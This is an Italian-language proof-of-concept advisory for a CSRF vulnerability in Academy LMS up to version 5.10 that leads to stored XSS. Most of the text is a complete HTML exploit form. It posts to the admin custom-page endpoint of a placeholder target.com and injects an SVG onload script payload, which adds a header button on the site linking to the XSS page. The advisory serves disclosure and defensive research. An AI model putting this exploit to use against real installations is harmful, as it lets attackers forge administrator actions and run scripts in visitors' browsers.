
Academy LMS <= 5.10 CSRF / XSS
Academy LMS <= 5.10 CSRF / XSS
Academy LMS è un'applicazione in cui le persone possono creare e promuovere corsi. La funzionalità di aggiunta di una nuova pagina è vulnerabile a CSRF poiché non esiste alcun token che possa prevenire questo attacco. Inoltre, questa pagina può essere utilizzata per caricare un payload XSS memorizzato.
Il primo passo della nostra prova di concetto è autenticarsi alla piattaforma come utente amministratore.
Dopo di che, basta accedere alla pagina che contiene il codice per sfruttare la vulnerabilità; si noterà che un nuovo pulsante verrà aggiunto alla home page del sito web, reindirizzando alla pagina xss.
Codice utilizzato nell'exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>